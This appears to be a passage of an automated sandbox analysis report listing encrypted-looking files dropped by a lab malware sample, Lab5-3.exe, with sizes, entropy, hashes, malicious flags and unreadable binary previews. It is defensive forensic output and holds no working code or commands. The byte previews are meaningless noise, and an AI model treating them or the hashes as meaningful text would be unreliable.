                                                                                                          SSDEEP:48:CIzot6rxInLRXASzeRnUNn3+E+ssXhxt2XRHfUTid3hBaUoSGFcmeykEdEElU92i:CNLzeRw3oDV2XSGx0uKeY2ElUJ
                                                                                                          MD5:C48A11801582C522915AB5B313346224
                                                                                                          SHA1:3C1A934BD7AA3F7F4F7F2FF4A3099942E5FC47B7
                                                                                                          SHA-256:8800B6DC9BB94753BAB6C6B40C5FFFA5757ACAEA9B20A5F57612A46AEC20E8C9
                                                                                                          SHA-512:56D61EAB65C5D38E84322DA1C18DF8929959B1AE581AC2D058D37B1114474911EB91B2F3A5D9A0B1258E31EDE36FCBA50F724D6CA2A3F98046F266AEEE417232
                                                                                                          Malicious:false
                                                                                                          Preview:......Yg=.z....c!.....(L..X..?MD..cG...lJ........]..$i.iD~qJ8..:7..(..4...>.0..J^......t_.h.Mw...u.AYg...k./8...G3.%.l... !.x.I.,.1i....).Z,{C...I..Fk.~..E.W..v<m../..%.rP....;.8.z .b...v.:.fJ8....,.=....3..T.C."V...4.v|.J (.+.........|'..V~.$.b..|.[........]..z...I....H...{X~5.X.............(."......tK....c.s.....Z."....(\.H`(.Q(...<.......z=..........F.`..+g../....#M`.......mH...e..3;2..~..~....zX....!@d..b.9....A.....xq$.d..f.K..i......$(....(.)...\....6Q...)$...F.>/:$,.n./...FJ..f.|.....Z&.E.r.......c....t..h.C...&......7...K?.....oW.....g9.I..u{...I..a.*.f....j}.:.....F..-].......N.x&Uo.Pv.....RNj.. m.cC.;...X.L0......*.v..zf..-.3.....\Wu..g.F..0$.2.#A:R.^.Jyuf!.......G.+.J..Jm@........7...6r.I.......b.~....."j..x8Ey........t7...j.-.........U].5.G.8...x3b...C@D...L-....c......V.(..4L!-.Y.......j..E..1..C+r.......i.BP...2C.iw..m.T..V5..f.^q..A[:.7..s.V....,f.(&.....s=..kK|oJ.'.1l.q.........+..D.K..p...d...).#xS..`y..zDU'...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13296
                                                                                                          Entropy (8bit):7.987688860057191
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:oGLhNTJ08nvbUsN8UdFYBYLC0iVy8c5natb:oUtrvtNZFYmW0sy8c5naZ
                                                                                                          MD5:33220B84B91D69A85F367E951EF7136E
                                                                                                          SHA1:AF916648FBD5DBA0CC02FE7EE4ACB557B4FCB08B
                                                                                                          SHA-256:E536E6B457319CB63A408B73F6DD99468CFC09374DB850FD580CB9629611234E
                                                                                                          SHA-512:3D382FBFC634BAA6880E8FEFADA46567D7D6D65CF99F8CFB774062DFB052A9961C76DBA2F9DC4DB26140CD8FBC3396647A56A3E4D4FDBA6306C81EE9B3B6D181
                                                                                                          Malicious:false
                                                                                                          Preview:.W(.V:.V.^..1..8.[#..a3qf..P..q.......MCcn........._.C..0.EQ..wT.8......&...e9:2.._.A:...... OB.{...l.|*...N5....q..h.../!.s.6>S...;..U|m...Ut..?..Y.H......m8y..:.4.....xE..gs..dw2..d..?IR.4$...iU......(..3yD..DV<!S#.Q.G....t....N..y-.E.......L2o.B.7*#q.......O..D%Z..wD.?..:.. ..NH>A........:F.~..v.cc*.......).#.'...~.QG..9..02.v.4.. .... N...5q....G3KL.......z..5s..`......J.R[.+...ow.ZGA.>H..@.l2..."ty..n$f.,F..WD......J...8....BVC..:jZ..../.....A;UO..O.......ORU...D.s.l.Q..._aSd...A........]g...f..An.G,...C.....n.-A..x.......s...i...6.s(...[....T%....[~.8~..L.....!.)x.t..3,.....G....dil.....,.7.FI2^.lp.\.....ZA+,..c......o.kf.._..%..^."Y.b..Ld..4.O.J...Z..p.......;.j4.o../3GZ.5.a....gF?.K..i4.M...}A....6*p...@b...l...l.-P...r.b....'A......)f...w...G.f".d..... .8.6...L|.@K.R.....).+._....R...:........-AY.6.u.u}.vY...n.....J..!+6.om.;......G.)SW...q7.y...`....m.k.U..f....l.?...`.3....]...0.o.>.!..-N.h...GHTN.G37 6......`_4...;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12864
                                                                                                          Entropy (8bit):7.985185432865168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:MYcpa+Z8rxIH3AgHj80BD8b9MSpNLengCfJojRtb:iadxi3I0+brPLeg4ojRZ
                                                                                                          MD5:D0A995B91A9EEA5F5DE821E790DAE150
                                                                                                          SHA1:B0B82437122453D921A68B3022419C9CC401FB82
                                                                                                          SHA-256:CAB390FF1EBCA170C149ABE5AB7C1666FA8FA847027107C4EFCCD0C47F13E5A6
                                                                                                          SHA-512:28307053C124ED142AE18D3D03A18A9C3EAC76760D745195E62C12C8A52EB406F7C36E9EB02A70313E5060491515EEC8ACEAC0B1270FE3A703B8A2B657F9B76F
                                                                                                          Malicious:false
                                                                                                          Preview:....2.1...c.M.0..h....../..k.T...En....J.u.f..f.K...3.^.....MF.6...,...:2O.r.`u5......x._.8.3ec.}aE.XcrpO..9...PV...=..sv..6..q.x..}W"6ZC.}..d..hAV..O...u3^.8..4,1<..}F.D...f.....9.Tf. ...?S.........ham.....\.C.P\.v...r....@..N.v...h.z.e#.....%p."..{..u.=....F.O.$...m..w*,...uY......:b..H.s|Ic..'..[."..>..x..mh.8..2.....o..)a.4..c.n..!.~.F'.....!.6.s.6.#[..3...P.J..L..v..|K1...2.....fc....xZv..b....m......a..y.]..L.c..v.t./...r..A1...P.N~X...a..oA.$}......k..X...wg.}S.Rs6...-..!#.4.=9..;....b.a...ofS..]e.(. ... .^.......W........c...mwq..8.X.P4.d.]...X.B.Uf?..)......!.....H..v..]...P.4...eW..CM5.c.p.....c.j|}W....y....[<...u.E..i,h.$*....Y..<..)C..=E!....G..$.......3I ...E$N...$y...<..0)..m{ |;..~L...../7..|..U.....6......U..`.....u3.6..!....#...P.2].....A.b}.\..kQ.r...[@C.Ok...&/CDMC..bnJ.._....HS....S.(WJ...6.>....A.J..\..d..z.Cr.4..a....+......$Z....t...$...N.1(....mk/./V.S.|*.L.,.}....x.3......LQ..~..U..,..I..#..?.I...NR
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3264
                                                                                                          Entropy (8bit):7.941898130572915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:tsu7IVAKHkr9qk+PfLLZxAuGx0uKeY2ElUJ:t0VAKEr9qk+PPZW90Cb
                                                                                                          MD5:BAB9970D2E92EF42D68FA6BA75516D2B
                                                                                                          SHA1:C6A81C74C1C9342D915BAB307E99841D9804C696
                                                                                                          SHA-256:AFEA14A491C6FC643B0168C567A9698756313D7CDE8CEA22DC564AFE998A7956
                                                                                                          SHA-512:FBBF16F86DB548F90BAC72FA43D1945166977E095FB00C8D700D36B86429D591499CE330B4CCAA30897CDDF01338E9CDB0E5538EB6C5E65E0E3F3E4FC3D14D90
                                                                                                          Malicious:false
                                                                                                          Preview:.+....|,Z2..L.........W.@.<...>r.X..."..K.7....c..fa...M..F.F.,(1:.1'n1....7...k.....;....z.J..y).U..U?...r9.uI.......]9 .l..N23.O.1...#@.?.c...6<.....1TjY?.t...{.,....3......h..p4#_..QM....-...'......R.x.HM.....". %..k."...H.H.{....C!.v../.t.Kt.I/.?%<.v...it}.Y?.fk$..r.|."4T.>+.l.4......E.."..k.K..Q+...O..nnHQg..l#..;.G....{..\.:.keB.9._..|.^.E.0...O.s.........M.w1..h..=..=.S...s.._pq.|..n.x.G.....hP."G)1v...+l....Gk.^j.`u%..w .t%`...6r....U-=..l..j@.2..0j...Yz..}..m.Hri.<\:..{.ih..1L.(......!..x...}<.......9.g.j.2Y...AA..:..B..>N.......M.I.x.a..~Y|..DY..rFR...vDp..nw+&..>.M+.T..w.0..d...WcE...*P..E}..a.[Ml.M......Bf.c.ek..!.AN:..Y.._..N...{.G.o_.c.......Rp1...M.zl.fj....8!..o......*..!l..B.(}w.zZ.7.u......|.....!$..y.X..0C.J.3jnrC....?M@8o.e.K_....t..{j~.}...>...4}\.5.....R.q.}..Y.......wy..{6...%<A8..r........_1.1.Q...J.m....g|.oaY.qw.c....TJ!..v........".CU.....7.M....l'..G..r..5..YG.@K.b.pA^U.3....t..3)..5u.$.......j.Imh..~.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13296
                                                                                                          Entropy (8bit):7.9886358335194165
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:FrHnwJDPhkuw0PDhtl4lvtkjYmSkqAfaX0BRw2FYzhVnCCJ9v4QupOhWgyTY0Cb:5HUPh/rhglvtkUmSkLsmaxJkTYtb
                                                                                                          MD5:7F51F8ECE26B97100D6DC97DF2EECB58
                                                                                                          SHA1:75C2996BAA2A577CA14083DE03EDC97C61DD0D08
                                                                                                          SHA-256:291B0EFA3BDE9B2C02C14AB89787FC897BFA23DE0981FB40268DFCEFED220060
                                                                                                          SHA-512:242CDC489844619AA11349B235B24101E2877B22B7AFB63AF414D5C02549E25B17941AE4E0DDA369818B550C4C31F84139CD1A1D1B9322A64ACBD06CE8D6BDE0
                                                                                                          Malicious:false
                                                                                                          Preview:F.9g...?>1.9B.[[.........W .i.7.wQY*...g......k`d].I..,.G.....2..)..{.B.y0. .$6].--.&;.|M...s...?.I..Y...+@............j.].{....j.<....6..;M.......&h.b.2.;.?...k...6...."...u.....Ht.-K....t...........j...@..].b.. ..>...?+..0....I.#..^Y.!.Jq....H.%.2....q..=....E....}v^.Ir.Gk.....q.[.C%...N....^:..N'.rE.....O.........t/..%^....>P.b...`.XB..tqq....}H{....9..C.|}1aa.y.=.....].....v.NZ.....ylnleO.....H.T...z....$....f.....V.].u...6....8n .+.S"h......V..u..=.f....9..<x"..=F)....v.y......^G..pj9l.E..;....}.l.G..|.SL....t......"p....o.R.&f.A..9.6.K...-.@.?.u.(<%&.O.?..A%$..^.Re..&...`H......./.>E.@Z|...\&.:...\....nW.>.4.wa('_..1.~........s..\1..|?I{j.'-c......Fy(...uF..6..jc.u........v.,^.5..~ .ys.`.{qJWA.].,]"....J..~.dQ.._............Mw....<.....o.r..:.E.....$1.)..s.>..r.T.C..Jf(D\i......"...lk....<...I.L.D.....5....v5H......=......6y.....Wu..9. M.......S..g.4.... ....[.#M.>..{.?(.........CWM..N...,.Sy.=...e....d.v4N..l6.0.]..o......"....I..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12848
                                                                                                          Entropy (8bit):7.985432507422492
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:E9JAbuTO+juXbFED4BmHoWLYURI4O86p2Pdtb:E9qbuy7B1BmHJ8+OidZ
                                                                                                          MD5:B1A19A6D4E98FD5302F90291DC98FBA1
                                                                                                          SHA1:F93DAA2970B9E7608ED149581BB38174EA58CE67
                                                                                                          SHA-256:F9C3F0ABE779C4D250E6D823B38944B3F0F9DB987668220FBBFF36CDBD7A3031
                                                                                                          SHA-512:72B6CB148388AA39F4D368F8E4C37C99B700A2C8FC7656E9E7BBC946A32C8FCC4624E52E3E675895614B34F5EDE8BB714C063BD97BC8DF246AFE5B36959956AC
                                                                                                          Malicious:false
                                                                                                          Preview:...3....3.G.[.....Ot.YR..=..c56...*.h&7xf0.'.?W....X'..=....X..r...r.0q..K.........>...V..c2.....E*/........CT..%......u..'......]VY.yb2.U..r..%...=.n.[$.<.F...bM......u..t..,+....pG.|..._%......+\.....p....Tug.AP...D....1~.`.....f.B..~.#.....Vw...Y.)v......\.A..s..2)x.-.!.\v.. ...y.....\%..i......'..*..1.b-?.qJv3.H4...x....t..l..Y..I..$.......*N..q.E. ~{.&.C~....."..i....tu...7.O/.../ewx......g...M.I._...8..F5.{.......l..WjU....='......')l......tx.....K..........JBj....9.u.K>K;..p..`q.P..3c...!....d.>....+..}.4LT.....b.#...>....?.$q...p...edF`....;N......<&.?f)...o...P.AY..'.i....n\nu.-.t.T.1....(..6.6...@....>&..>....J.3.x.jQ.M...}^. ...R.j.."s\C&.r..Wb.?....7..@|=...:.....U9..Y...t..Mkoo.y.o.z..Z0.#.....#...ts.....;)Z.........I[..6...XO39!R.2.(........sW.)..c..S..:......./*C.j..".R.....1.Mj....j6.....R..$...."..DO.O5..P..r0.g.E.+|.{.0.'^..G@.....:PG..o..^..E..k.._..H..::..M..<j....e.L.qB..Z*..Ex..<L1aS9^./.u....k. C.... ...[..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4784
                                                                                                          Entropy (8bit):7.956421010384116
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:o2G7HFNEGNMsoVnaxIBt2ZOiREIZFVGx0uKeY2ElUJ:o2AbSs0jB0ZpREIZM0Cb
                                                                                                          MD5:140AC5749C918BFA688A90C007F75D70
                                                                                                          SHA1:BB3AB7D35E0620760FCCC4B42BF466E620B8C903
                                                                                                          SHA-256:01B6EB86433A514A7E2F3156711784807B70FA886C93309E4DB50A926376323E
                                                                                                          SHA-512:B3104222D2C7F2BA72B736BA7C44380E0D4C2E232BEBED6E7364272D6A11851005B4FE85BFD76326CBC15636CFB0AED770D9273DFC53E8908F5DC68AFEA7ADB3
                                                                                                          Malicious:false
                                                                                                          Preview:.M...8+.:.._.`HI..2.&..J=1K.Pc.w(....._pv.gc.qp...h.eT2....k7I...L.@..k.B....j7<...o.Z0.N.uw...rb....vW83.Q......'...=.ND.iWV......W....V'..K..D.M.\...2..|'...5...O.'.....&..&ah..6...LFd..+.:'.W..h.VsX...N1h"7S'..2.\..=.e0't.:}..U.+...Z...{.....{..e..E........p.B.....[=.....4a.......70................)...R....(..Q:..j.3..k.\.,...e.Q...X.....G.b..".M..~....`>..w &.{._..[..bJ.h.2..L.f..8..<Dg.&2...A.').T.....tq .l4...,0.......x.Q.+.n..D.......v.F.......O........A"..l........=...l./.P#........K..i.g..d....%@. ....tS.....$.g...|.q.Xz...H...6.:&..............v..].k .....m.F.u8.~.5..\.J....8..0.w(..<....\m.W./"wd.4.1..x.?.=.......BK..7.s.imy..u?...J3...BG0VA...=..P.>[......w,..W`....*...MJV.awr.q...e...`..Ek...I.......+...X.. .....*.c...i.../:|. .....w.... ..q.j`..a.B....v...+.5...U..i]$....e.Lb.......@S.?.......1.\.A...-\.?...9Wb..=.fM.........J.......|.V..Lc...s(...:..._.!....t#LPb..r.._....N[R.x......[......6..._We.r0.PC..{R.b..gs6g..7h.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12608
                                                                                                          Entropy (8bit):7.986120385355571
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:JOlvFi3paihXC+EXcxm6LQUp2LKHY7/TpwwiWCN5FbV845ei1WWGKmoO0Cb:Jmc3cNDMxzlILK0LnEvbVbsVDoOtb
                                                                                                          MD5:127420BA637DE69FA1D189E888791169
                                                                                                          SHA1:BC4410F194DC82EF4D42A1E7E78AB6141E78DF45
                                                                                                          SHA-256:8E46B62B7C5AA6A67914109BC9FA9CDED11E35D46983B74F1DE382CCE3154D79
                                                                                                          SHA-512:15144A10C45868F0FC9EE20C183B1D25031FAC4B270D687C484EA7B9AC9A4334CB03ECEF51890B3ECF71FF339CD25717B0ED42A8B9013C60BBAEBF9D187BFA7B
                                                                                                          Malicious:false
                                                                                                          Preview:K.yI.L.WEN.QPe..S;>.H...s.m..g77...<.X.9?...H..i.<.a../s....6..D.)..<S.0.r^.(8...V*R......F.#....}..X....b....j.<....;..'.....6m..p...T.....`.q..m..W..k.9.....sH.....+...Y{./.i{....k.......+w.7...........QY.......c.+..[...S:|.].9.rwD@..d....;( A).o..r[..1f.<y..A..R.iU~,e..n...U\........Y...owV....Y$.....g..+..n.iM.p.f.Q..Dc.....d......*.........I..I..x.F.....0..s..6.......'.b....+...}{..OA.y._...w.l$.W.p^g........w..z...Xj.h.1Sas.^a4.o@[y.~WV]...1. .Z.:v..J.i..tb..OK/=....s.'..?....4..`0...L.O_....DW..v.+..f...7.../....W.Y.g{...f...5....H....:A..~m.H/^.....{^v}R..c.d...C...A....H.`zv...~....*.....S..2S..i..2..a.M+D.b.}..%n.Yq..~D..c.r$....tN...J....|.........s>.QA.w..8.}..l...<7.e8u.n..(....}.[v.>.1.6.L..2.(.v....v....f=..$e.....l:...i....2......{x.CgT......U[...9...tgO.N.$0..G^v..:\.jT.7y..:+.U..AK....tX...!.A.e..w.0.9..u..4+.5...)T-6.]yy...0.<>...Kz.....Ky.T.Sb...[.......Y...q......o.S..(.........../YSgh.q.{........#...@.|...]I..h..a.k....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.903273033674919
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:D3QUCifEpUiAHf+HfUTid3hBaUoSGFcmeykEdEElU92i:D359EYGx0uKeY2ElUJ
                                                                                                          MD5:180E6B7BEC65B760B396B3F8351AC9F6
                                                                                                          SHA1:21769805B3EDCB81A01E970979685B9E97A1DA42
                                                                                                          SHA-256:ABE82A131A57C74D7F12AEE3DDED2E5C212D3690A33756A76976864C0DEE57E9
                                                                                                          SHA-512:9A321CC4E806601213103D1ED1CA71F56BC33544EA46561343BA1DF7E2FEF76034F4E3E5BA2F034E8CE1076BC1DD00FB2DCADFEC889EDEF212C9B053DEA4FEC7
                                                                                                          Malicious:false
                                                                                                          Preview:..L.ZAD...<......v)RG..V....@w.Pf.....-.._P2...\.....;..:x)~.#SU..m%.g=vML..h#.T.V.3P'](.LV...J|..>ue.vd.".O....t..\.....Q.z.....iy}F....^.A.a...m|.lT.....s.,Lu.....%.B,.'.5. W.!...&.u..../.....Q(..l.(.3z..W.....H...[.-..."}..3[..Ul5K7(.v.S.~616..3W..ex|..G'.w{..)\..7.0..?.&i..2.....9Q9y.;.$G..0!.....k.0H..|Zd.....:.".J..m..t.,......A...O...)O..v..}RjE./....H.1....ir._...."o...%..@..=.l..#.g......@N..|..=I"..j.Y.%..%".:....Ri2..'...ONo.15...C...:l.X4RY.J.....k....w.^.i.E..#...H.>..._.s..\......0X.f.s.7.K5T.S.$..r.....j..g...4q.x".m.f..K....$mF^..iK.....~.KZ.......G.v...k..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4816
                                                                                                          Entropy (8bit):7.961459077158565
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:xQ7tfY+I9xOt/PgemPgrYqc4earCmDNPvBv/fe81oxFf2iB4Gx0uKeY2ElUJ:xQ7tfY8u7IrYSe7mDNXBv/4xF770Cb
                                                                                                          MD5:A6B5007DCD2E427C9645CD7DF64F5B04
                                                                                                          SHA1:835E584CF9D8E9B872F23E480DA08619119FDDC0
                                                                                                          SHA-256:58627762664F145F07E77E1B7BBF376A7CFE6300DE1BE958B7DF819461A009A0
                                                                                                          SHA-512:BD4BA7CF0E85555781BFFC50FDB055688397F28FD2DF39AE36DDB72091987AA3DBF0E58AAFFF928C953ED4C73D75EE767D8A2E3DB4F93D66503730B670E0564F
                                                                                                          Malicious:false
                                                                                                          Preview:..A.DA...?x.;N.kr6.......na.C..Pu..{....p.....NQ1.>...G..zH..]$.u.$z......w...<.._ N...k.t...4.%.5..I9..[....+..!.. .r..#....Z....Eh.du....#..O........a..P.+\.}>.t....d..V....y..m...gk.../....I.R.@.........Ft.....N.Qr..J...\.W.g_I..s.Y..P....@(.....b..t.8.#.=...y...;.*.|.w...4S..g.R..oMW....g.az.g .\...d_w...T..4.k.^.G....>...c1]N.Uc..d).Ujl.....y}O.......i........]......F.M..H..;38..`.*.Qf. r....>4.>....b.....FV.\....<.T.j5~a...V.l..[.........7.w.....4.TshF...........@.....Oi.~.k.r...E.%S.j.jk#^.....Y....l8...>.Z,.*.QT....A.......hS.,^....\(!......md.C\uy..O6..H4.7..?(9YV.f..1Rd.{.3.@....4.@.:K.......bR.....~..d.....1..Z.P......ql.=mHg>.V.zL....N1...i.3..6(.W.-.s..p6u1"..OX......+..". .jrR..|.[.2Ze..3...Y./j....9.....6.;....+)%....;(F..er.L../.H......U.....S.(..G^..E.&...L;..f.*...X...e..Z._.'....L0....6{S...>,...4..k........y.....|....xH(..;[..|...[.[O...........5..(2...t2.....W..............DX.|\sw.}....VE....Z8..#..O.^a7....@.d..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12608
                                                                                                          Entropy (8bit):7.982673655656617
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Jb2fpl6eZ7r0cjw99QsgHdSBEW3dbjEhQII+8D+3i13U2cPy0Cb:l2Rlz7rrjw9Dg9SBEyxjqp3ek2ltb
                                                                                                          MD5:0E2E924BB12E9CD8C9BB0A7AED6F0866
                                                                                                          SHA1:995316E686BCD670C82DC07481577586B759B54D
                                                                                                          SHA-256:4683238807DE60CE18D39919FC259B294FC7949B2DA078DCEE401D33A39476CA
                                                                                                          SHA-512:A19F84FEB3D3F7D6C9CCE5AF48A178427D3AD67E8B31C2E8B68CE933B4D583207610D0060DEC8B777606CD5DCEA4B18110582A042857A377B137E974CAE9AF9C
                                                                                                          Malicious:false
                                                                                                          Preview:.......r%a.G+X..i5......0..o.[..X....~h.t.&M...O.7e.<.&X.....f.=.C.Ezt..h...7t>..t.}>.>V..... $...Nb.R-.#..>......r_.8..$..V.#.%C.......L.8..=.%Bq.F.X..j1.v...(&T4....-'.,..@Q.21z.....d....y...>fx...%%.nG~_p8+...G...-......_.>c...W..I.q..'..r...H..,.'.M..... ...S...4....08..:..;;F..#..../;...k.>L.....#..T..c..;..Oc..<.....OT.1Q:.._...'.`...:.X..)3.....oTv..8.....(!..XM...,Su.].....wS@..N/*.:..<lR.B....a.yK.-.6K.,..>. ^...f.w.%c.{....M.1m...&.>..@.>..!.x.p..*..2X...[$6&..w(Y...)%o.S.g..n../....}.R.m.*>.....w.B.B9.H..S...}.....f.2fhpn....^e......O.....}.....Q....!.X.M...|`.-..C.Y7...c.,....`...zQ,...~R....[..3>..x..L..OgOn.,..0.....E......J7#.T...e....A..).7[;~..U.?.V...........C.r..1....3.F..$n.....j.q..k.s......5D>?....*...{;...y.)...j..L=?...<.-.wF+...o..@.D@.8*...........w.."..b....?.y3c.hh.0dTp..............}s..3.4Y.U9@..S...u.3.{Y0$....:..0.V.J.....u.2.G.N...|^?o. ....k>2.....5.38.g9%.Fp......QM....#.%..?....-..P.#..e.7..=j.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):159552
                                                                                                          Entropy (8bit):7.998867465960185
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Mam3tGAYJYy0eYzEJcBam4U1iyO0lGkb9Oh+xWI8oWTzZ:IsJseYzEJcBwU/5YB+xWItW/Z
                                                                                                          MD5:136F8B17A300E41A9AAC06B2C606AD4E
                                                                                                          SHA1:A7531FE36E9D7C9266C9355598B6FFDAFC9A9BD7
                                                                                                          SHA-256:97BA796BC5C6E54BC902433B46C27CEBB2DB5EAC96556B8609D55B154193BEC5
                                                                                                          SHA-512:14F47933809B1033A07E49C8082CF187BD99BB7DE614B839B3EAA43989AE3D9F89C903D038B9DFBF139F807F73B206736CE8BA8B2CA57C297A1F5EDC9ECF2E56
                                                                                                          Malicious:true
                                                                                                          Preview:....[|f)...j..m..........qm.G.Hs/.`.zF........[VU.......8.jBs..5.*.I.im-.:.G.>../t4...3...R..eSB(..M...2.(.N.]...L.C.o.....3g."=....'..KuQ..S=y....?..G._*X....L.......j.J.....>.. n..D.;...7%..q@.Q%.......&s....!.U......>...,..P...V.X.,J....v..t0z.l..[....l.....R?.#............x..&q..`.Yy.m..../\>..dxE..D......x... ..I...7.L.n.../.....;#V[.....8...{:.....:.=.Pb\E.-..[.....Ox..4}-..4...{......s-z~...w...of^.]....H."..&c..5.k....l...q.:..A/JS.~X.(Q.~.....<.qZ.*.<..S...>......d.}d..?nuN.).40.+.z..v.D.=.z..'e..B..S...+.x..}.r..3...:&Y.P/....b.'.!..b*...VE.*.m.c[E.Y;..Qg....s..u.=.L..o.f.H..R.b0..Z...&#u...L..?!E.).;>.I...(...R..R.`C....k.F......'.R=.....y..........B{.%..K.a<.7.F...zo...-.....y......;l.......G....D]bB.!0..t.w^....wNH>.}......Y..(..d....e..;.....eb.._X.........V....&...R.........-.UU%..xO....4..Jx.&..U....^.lP....hs.m.K*....^..f........Ci).........c...D.RVR5'Z2.ek3.....5.G.Un"...A.A.....KA&...b..!.B:...._6..C....S....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19760
                                                                                                          Entropy (8bit):7.9899644768553495
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:/F88/Vl8JBAVTsUCAI8GPrGNwADxB3qjuimY6lhazK6ewtb:98MyJBAVTV7RUGNb3ZimYJewZ
                                                                                                          MD5:85FCFBFCFC9E422058A93AB68E2F3591
                                                                                                          SHA1:61F48156FA8918F78D951CF689E49ED4A3D29760
                                                                                                          SHA-256:0CF253417B65DB5EFFF0DF39B111D898841D101B9034B01649C3528648EB11B7
                                                                                                          SHA-512:51B80B8D69273CE1859FF45C954C1E0A027A7A150F0DEB4E9BDBDE4C62066CCCD08E66C2A71113618C5C20FD078C5318774DBE2211F313E5D763E5B50EB491DD
                                                                                                          Malicious:false
                                                                                                          Preview:.......z.]&k...XG..{.....ep.4...p..]..p...P8.'-*h....d....i.......8jQ.7.Y.B.%...VZ.....G4.S....Z..K.......`C)..C..%>..%.[.\.....[s....`R@R......]#zB.../.'......B....3..=.w.BR..'\SSLR...h."%Ku..w.F.K...........,W...R..l.VK.$c.U....6|..=.N.........+.q..o.....|.vBd2...4..1IW...0A..x..A."..;ZvB...,.(.`..4.'..lO[.Y..B...7..T....R.........U`.q..x..*.<^.%..9...Ww.N.._0..Xj.....h...;....N.2...H-J.V......*. w......)."..9R...\.!..<X...a....g...[V.na....t@Z.ez(`......"....~..y.....L..(xh.l.7-.j...u.q.}.T,.b....V.G..t.V...@C-@.Y..9..H.z9U.....$[.A..b..1.`....O....;.<.....:9k....Q..g.$z).y....`...o.k..fi.2".yA.x..%!AT....g.!....p.....fh.../....3nG|.dh.....8\_..`....K.P+...rW..,.@.1.YZ lO.NZ..(y.`z........M8!F..i..P..._fb......M....)..nN.'....g.P.C.....|..c.0..pz.{->xG_......b.#...._a,.*8W....-...;.2........)...6..+8.+r.B..g.S...`.3..S~..F...]. ..W....O.b....|.P..?.NX...*...-.0.q...+..8.....x9......`N...\[.E..e^.8....^I....d:...-.....;. ..n..k...2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.985765243653165
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:XjKzGh5Waj0lII2SpFfrntFOoNpGuo3u3p4LKb/LeooreCwkoQTy0Cb:TBWajaIupxrnbOgo3upV/LxWwkd+tb
                                                                                                          MD5:E7F0D5C3DD6B6A2469F91ACC1288A4B1
                                                                                                          SHA1:6ADCE1A7BD89381ED114447DD965FF4DEAE5E251
                                                                                                          SHA-256:C56FC91CE9B300454D5AA20A149A81E02B861E32F31630FD595A37FBE6E208BD
                                                                                                          SHA-512:9D22C96FC100D4D1E787F1A27112D640E3D69293AF635EBD02D9BEC8A09E2ED80D47EDB99E902F4286A9314273232C2EE46D7447094578D54DBD1D8C9F3949CF
                                                                                                          Malicious:false
